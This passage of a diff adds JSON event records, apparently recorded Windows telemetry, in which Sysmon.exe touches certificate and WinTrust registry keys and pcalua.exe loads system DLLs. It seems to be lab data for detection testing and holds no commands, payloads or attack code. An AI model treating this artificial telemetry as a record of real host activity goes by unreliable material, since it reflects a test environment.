"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": "C:\\Windows\\System32\\ndfapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 